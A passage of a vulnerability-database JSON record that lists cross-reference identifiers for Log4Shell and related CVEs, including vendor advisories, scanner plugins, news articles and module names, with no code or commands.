"B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442", "KLA12464"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:833279010C6AFB764A7A964FBF59CD1D", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B8C767042833344389F6158273089954"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-44228", "MS:CVE-2022-0609"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "DEBIAN_DSA-5079.NASL", "EULEROS_SA-2022-1276.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "FREEBSD_PKG_E12432AF8E7311EC8BC43065EC8FD3EC.NASL", "GENTOO_GLSA-202202-02.NASL", "GOOGLE_CHROME_98_0_4758_102.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOSX_GOOGLE_CHROME_98_0_4758_102.NASL", "MACOS_SPLUNK_824.NASL", "MICROSOFT_EDGE_CHROMIUM_98_0_1108_55.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "OPENSUSE-2022-0042-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "osv", "idList": ["OSV:DLA-2842-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:DSA-5079-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q", "OSV:GHSA-VV6J-WW6X-54GX"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167917"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0296", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "schneier", "idList": ["SCHNEIER:A04F4786905DA91D85C88E72BCD1F5E6"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1", "OPENSUSE-SU-2022:0042-1", "OPENSUSE-SU-2022:0077-1", "OPENSUSE-SU-2022:0110-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB"]}, {"type": "thn", "idList": ["THN:1D10167F5D53B2791D676CF56488D5D9", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:4DE731C9D113C3993C96A773C079023F", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:87B95415D8745E9CCD461A9997E67EFE", "THN:933FE23273AB5250B949633A337D44E1", "THN:A7304742B34CEB82ECB0DB1AE4DD7116", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:C73B84809CDC20C90C26FF1B7F56F5D4", "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "THN:E48AEFF468AB8445D91A32B6F5D7A770", "THN:E7E8D45492BAD83E88C89D34F8502485", "THN:EC6517AAC0BD5D8BBC4C4D32420CA903", "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840"]}, {"type": "threatpost", "idList": ["THREATPOST:02A472487653A461080415A3F7BB23D2", "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "THREATPOST:10245D9804511A09607265485D240FFF", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:138507F793D8399AF0EE1640C46A9698", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "THREATPOST:14D52B358840B9265FED987287C1E26E", "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:3FDED0EC415BA165368B72AB2A8E1A59", "THREATPOST:40A09F08F388BACF08E0931C6473DE0C", "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48FD4B4BFA020778797D684672C283B0", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", 